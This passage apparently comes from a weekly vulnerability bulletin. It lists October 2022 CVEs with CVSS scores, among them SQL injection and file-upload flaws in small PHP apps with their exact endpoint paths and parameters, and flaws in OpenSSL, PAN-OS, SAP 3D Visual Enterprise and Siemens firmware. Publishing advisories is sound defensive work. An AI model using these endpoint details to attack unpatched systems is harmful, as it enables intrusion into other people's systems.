online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell. 2022-10-14 9.8 CVE-2022-42064
MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-13 7.2 CVE-2022-41533
MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/createOrder.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-13 7.2 CVE-2022-41534
MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editclient.php?id=. 2022-10-07 7.2 CVE-2022-42073
MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editcategory.php?id=. 2022-10-07 7.2 CVE-2022-42074
MISC
online_leave_management_system_project — online_leave_management_system An arbitrary file upload vulnerability in the component /leave_system/classes/Users.php?f=save of Online Leave Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-07 7.2 CVE-2022-41379
MISC
online_pet_shop_we_app_project — online_pet_shop_we_app Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order. 2022-10-12 9.8 CVE-2022-41408
MISC
online_pet_shop_we_app_project — online_pet_shop_we_app Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=maintenance/manage_category. 2022-10-07 7.2 CVE-2022-41377
MISC
online_pet_shop_we_app_project — online_pet_shop_we_app Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=inventory/manage_inventory. 2022-10-07 7.2 CVE-2022-41378
MISC
online_pet_shop_we_app_project — online_pet_shop_we_app Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order. 2022-10-12 7.2 CVE-2022-41407
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_loan. 2022-10-07 7.2 CVE-2022-41514
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_payment. 2022-10-07 7.2 CVE-2022-41515
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_borrower. 2022-10-12 7.2 CVE-2022-41530
MISC
open_source_sacco_management_system_project — open_source_sacco_management_system Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_plan. 2022-10-12 7.2 CVE-2022-41532
MISC
openssl — openssl OpenSSL supports creating a custom cipher via the legacy EVP_CIPHER_meth_new() function and associated function calls. This function was deprecated in OpenSSL 3.0 and application authors are instead encouraged to use the new provider mechanism in order to implement custom ciphers. OpenSSL versions 3.0.0 to 3.0.5 incorrectly handle legacy custom ciphers passed to the EVP_EncryptInit_ex2(), EVP_DecryptInit_ex2() and EVP_CipherInit_ex2() functions (as well as other similarly named encryption and decryption initialisation functions). Instead of using the custom cipher directly it incorrectly tries to fetch an equivalent cipher from the available providers. An equivalent cipher is found based on the NID passed to EVP_CIPHER_meth_new(). This NID is supposed to represent the unique NID for a given cipher. However it is possible for an application to incorrectly pass NID_undef as this value in the call to EVP_CIPHER_meth_new(). When NID_undef is used in this way the OpenSSL encryption/decryption initialisation function will match the NULL cipher as being equivalent and will fetch this from the available providers. This will succeed if the default provider has been loaded (or if a third party provider has been loaded that offers this cipher). Using the NULL cipher means that the plaintext is emitted as the ciphertext. Applications are only affected by this issue if they call EVP_CIPHER_meth_new() using NID_undef and subsequently use it in a call to an encryption/decryption initialisation function. Applications that only use SSL/TLS are not impacted by this issue. Fixed in OpenSSL 3.0.6 (Affected 3.0.0-3.0.5). 2022-10-11 7.5 CVE-2022-3358
CONFIRM
CONFIRM
paloaltonetworks — pan-os An authentication bypass vulnerability in the Palo Alto Networks PAN-OS 8.1 web interface allows a network-based attacker with specific knowledge of the target firewall or Panorama appliance to impersonate an existing PAN-OS administrator and perform privileged actions. 2022-10-12 8.1 CVE-2022-0030
MISC
panini — everest_engine Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file. 2022-10-07 7.8 CVE-2022-39959
MISC
MISC
passport-saml_project — passport-saml Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g. without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround. 2022-10-12 8.1 CVE-2022-39299
CONFIRM
MISC
powerline_gitstatus_project — powerline_gitstatus powerline-gitstatus (aka Powerline Gitstatus) before 1.3.2 allows arbitrary code execution. git repositories can contain per-repository configuration that changes the behavior of git, including running arbitrary commands. When using powerline-gitstatus, changing to a directory automatically runs git commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory to one controlled by the attacker, such as in a shared filesystem or extracted archive, powerline-gitstatus will run arbitrary commands under the attacker’s control. NOTE: this is similar to CVE-2022-20001. 2022-10-13 7.8 CVE-2022-42906
MISC
MISC
progress — whatsup_gold In Progress WhatsUp Gold before 22.1.0, an SNMP MIB Walker application endpoint failed to adequately sanitize malicious input. This could allow an unauthenticated attacker to execute arbitrary code in a victim’s browser. 2022-10-12 9.6 CVE-2022-42711
MISC
MISC
MISC
puppet — puppetlabs-mysql Command injection is possible in the puppetlabs-apt module prior to version 9.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise. 2022-10-07 9.8 CVE-2022-3275
MISC
puppet — puppetlabs-mysql Command injection is possible in the puppetlabs-mysql module prior to version 13.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise. 2022-10-07 8.8 CVE-2022-3276
MISC
redirection-for-contact-form7 — redirection_for_contact_form_7 Unauthenticated Options Change and Content Injection vulnerability in Qube One Redirection for Contact Form 7 plugin <= 2.4.0 at WordPress allows attackers to change options and inject scripts into the footer HTML. Requires an additional extension (plugin) AccessiBe. 2022-10-11 7.5 CVE-2021-36913
CONFIRM
CONFIRM
ree6 — ree6 Ree6 is a moderation bot. This vulnerability allows manipulation of SQL queries. This issue has been patched in version 1.7.0 by using Java’s PreparedStatements, which allow object setting without the risk of SQL injection. There are currently no known workarounds. 2022-10-13 9.8 CVE-2022-39303
MISC
CONFIRM
resiot — iot_platform_and_lorawan_network_server Cross Site Request Forgery (CSRF) vulnerability in ResIOT ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 allows attackers to add new admin users to the platform or other unspecified impacts. 2022-10-13 8.8 CVE-2022-34020
MISC
MISC
rpcms — rpcms RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add an administrator account. 2022-10-13 8.8 CVE-2022-41475
MISC
samsung — dynamic_lockscreen Improper authorization in Dynamic Lockscreen prior to SMR Sep-2022 Release 1 in Android R(11) and 3.3.03.66 in Android S(12) allows unauthorized use of javascript interface api. 2022-10-07 9.8 CVE-2022-39862
MISC
samsung — smartthings Improper access control vulnerability in WifiSetupLaunchHelper in SmartThings prior to version 1.7.89.25 allows attackers to access sensitive information via implicit intent. 2022-10-07 7.5 CVE-2022-39864
MISC
samsung — smartthings Improper access control vulnerability in ContentsSharingActivity.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast. 2022-10-07 7.5 CVE-2022-39865
MISC
samsung — smartthings Improper access control vulnerability in RegisteredEventMediator.kt SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast. 2022-10-07 7.5 CVE-2022-39866
MISC
samsung — smartthings Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via SHOW_PERSISTENT_BANNER broadcast. 2022-10-07 7.5 CVE-2022-39867
MISC
samsung — smartthings Improper access control vulnerability in GedSamsungAccount.kt SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcast. 2022-10-07 7.5 CVE-2022-39868
MISC
samsung — smartthings Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via REMOVE_PERSISTENT_BANNER broadcast. 2022-10-07 7.5 CVE-2022-39869
MISC
samsung — smartthings Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via PUSH_MESSAGE_RECEIVED broadcast. 2022-10-07 7.5 CVE-2022-39870
MISC
samsung — smartthings Improper access control vulnerability in cloudNotificationManager.java in SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcasts. 2022-10-07 7.5 CVE-2022-39871
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated ACIS Part and Assembly (.sat, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-39803
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated SolidWorks Part (.sldprt, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-39804
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Computer Graphics Metafile (.cgm, CgmTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-39805
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated SolidWorks Drawing (.slddrw, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-39806
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-39808
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dwg, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41167
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated CATIA5 Part (.catpart, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41168
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated CATIA4 Part (.model, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41170
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41172
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Enhanced Metafile (.emf, emf.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41175
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Iges Part and Assembly (.igs, .iges, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41177
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Jupiter Tesselation (.jt, JtTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41179
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Portable Document Format (.pdf, PDFPublishing.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41180
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Windows Cursor File (.cur, ico.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41184
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens a manipulated Visual Design Stream (.vds, MataiPersistence.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41185
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Computer Graphics Metafile (.cgm, CgmCore.dll) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, a Remote Code Execution can be triggered when payload forces a stack-based overflow and/or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41186
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41187
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 7.8 CVE-2022-41188
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dwg, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41189
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41190
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Jupiter Tesselation (.jt, JTReader.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41191
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Jupiter Tesselation (.jt, JTReader.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 7.8 CVE-2022-41192
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Encapsulated Post Script (.eps, ai.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41193
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Encapsulated Postscript (.eps, ai.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 7.8 CVE-2022-41194
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated EAAmiga Interchange File Format (.iff, 2d.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41195
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated VRML Worlds (.wrl, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41196
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated VRML Worlds (.wrl, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 7.8 CVE-2022-41197
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated SketchUp (.skp, SketchUp.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41198
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Open Inventor File (.iv, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41199
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Scalable Vector Graphic (.svg, svg.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41200
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Right Hemisphere Binary (.rh, rh.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41201
MISC
MISC
sap — 3d_visual_enterprise_viewer Due to lack of proper memory management, when a victim opens a manipulated Visual Design Stream (.vds, vds.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer – version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory. 2022-10-11 7.8 CVE-2022-41202
MISC
MISC
sap — business_objects_business_intelligence_platform Under certain conditions an authenticated attacker can get access to OS credentials. Getting access to OS credentials enables the attacker to modify system data and make the system unavailable leading to high impact on confidentiality and low impact on integrity and availability of the application. 2022-10-11 7.6 CVE-2022-39013
MISC
MISC
sap — commerce An attacker can change the content of an SAP Commerce – versions 1905, 2005, 2105, 2011, 2205, login page through a manipulated URL. They can inject code that allows them to redirect submissions from the affected login form to their own server. This allows them to steal credentials and hijack accounts. A successful attack could compromise the Confidentiality, Integrity, and Availability of the system. 2022-10-11 8.8 CVE-2022-41204
MISC
MISC
sap — manufacturing_execution SAP Manufacturing Execution – versions 15.1, 15.2, 15.3, allows an attacker to exploit insufficient validation of a file path request parameter. The intended file path can be manipulated to allow arbitrary traversal of directories on the remote server. The file content within each directory can be read which may lead to information disclosure. 2022-10-11 7.5 CVE-2022-39802
MISC
MISC
sap — sap_iq SAP SQL Anywhere – version 17.0, and SAP IQ – version 16.1, allows an attacker to leverage logical errors in memory management to cause a memory corruption, such as Stack-based buffer overflow. 2022-10-11 9.8 CVE-2022-35299
MISC
MISC
siemens — 6gk6108-4am00-2ba2_firmware Affected devices do not properly authorize the change password function of the web interface. This could allow low privileged users to escalate their privileges. 2022-10-11 8.8 CVE-2022-31765
MISC
siemens — 7kg8500-0aa00-0aa0_firmware A vulnerability has been identified in SICAM P850 (All versions < V3.10), SICAM P855 (All versions < V3.10). Affected devices do not properly validate the parameter of a specific GET request. This could allow an authenticated attacker to set the device to a denial of service state or to control the program counter and, thus, execute arbitrary code on the device. 2022-10-11 8.8 CVE-2022-41665
MISC
siemens — 7kg8500-0aa00-0aa0_firmware A vulnerability has been identified in SICAM P850 (All versions < V3.10), SICAM P855 (All versions < V3.10). Affected devices accept user defined session cookies and do not renew the session cookie after login/logout. This could allow an attacker to take over another user’s session after login. 2022-10-11 8.1 CVE-2022-40226
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). The device embedded Chromium-based browser is launched as root with the “--no-sandbox” option. Attackers can add arbitrary JavaScript code inside “Operation” graphics and successfully exploit any number of publicly known vulnerabilities against the version of the embedded Chromium-based browser. 2022-10-11 8.8 CVE-2022-40182
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). The device embedded browser does not prevent interaction with alternative URI schemes when redirected to corresponding resources by web application code. By setting the homepage URI, the favorite URIs, or redirecting embedded browser users via JavaScript code to alternative scheme resources, a remote low privileged attacker can perform a range of attacks against the device, such as read arbitrary files on the filesystem, execute arbitrary JavaScript code in order to steal or manipulate the information on the screen, or trigger denial of service conditions. 2022-10-11 8.3 CVE-2022-40181
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). A Cross-Site Request Forgery exists in endpoints of the “Operation” web application that interpret and execute Axon language queries, due to the missing validation of anti-CSRF tokens or other origin checks. By convincing a victim to click on a malicious link or visit a specifically crafted webpage while logged-in to the device web application, a remote unauthenticated attacker can execute arbitrary Axon queries against the device. 2022-10-11 8.1 CVE-2022-40179
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). There exists an Improper Neutralization of Special Elements used in an OS Command with root privileges during a restore operation due to the missing validation of the names of files included in the input package. By restoring a specifically crafted package, a remote low-privileged attacker can execute arbitrary system commands with root privileges on the device, leading to a full compromise. 2022-10-11 8 CVE-2022-40176
MISC
siemens — industrial_edge_management A vulnerability has been identified in Industrial Edge Management (All versions < V1.5.1). The affected software does not properly validate the server certificate when initiating a TLS connection. This could allow an attacker to spoof a trusted entity by interfering in the communication path between the client and the intended server. 2022-10-11 7.4 CVE-2022-40147
MISC
siemens — jt_open_toolkit A vulnerability has been identified in JTTK (All versions < V11.1.1.0), Simcenter Femap V2022.1 (All versions < V2022.1.3), Simcenter Femap V2022.2 (All versions < V2022.2.2). The JTTK library is vulnerable to an uninitialized pointer reference vulnerability while parsing specially crafted JT files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-16973) 2022-10-11 7.8 CVE-2022-41851
MISC
siemens — logo!_8_bm_firmware A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). Affected devices do not properly validate the structure of TCP packets in several methods. This could allow an attacker to cause buffer overflows, get control over the instruction counter and run custom code. 2022-10-11 9.8 CVE-2022-36361
MISC
siemens — logo!_8_bm_firmware A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions < V8.3). Affected devices load firmware updates without checking the authenticity. Furthermore the integrity of the unencrypted firmware is only verified by a non-cryptographic method. This could allow an attacker to manipulate a firmware update and flash it to the device. 2022-10-11 7.5 CVE-2022-36360
MISC
siemens — logo!_8_bm_firmware A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). Affected devices do not conduct certain validations when interacting with them. This could allow an unauthenticated remote attacker to manipulate the device’s IP address, which means the device would not be reachable and could only be recovered by power cycling the device. 2022-10-11 7.5 CVE-2022-36362
MISC
siemens — nucleus_net A vulnerability has been identified in Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions), Nucleus Source Code (Versions including affected FTP server). The FTP server does not properly release memory resources that were reserved for incomplete connection attempts by FTP clients. This could allow a remote attacker to generate a denial of service condition on devices that incorporate a vulnerable version of the FTP server. 2022-10-11 7.5 CVE-2022-38371
MISC
MISC
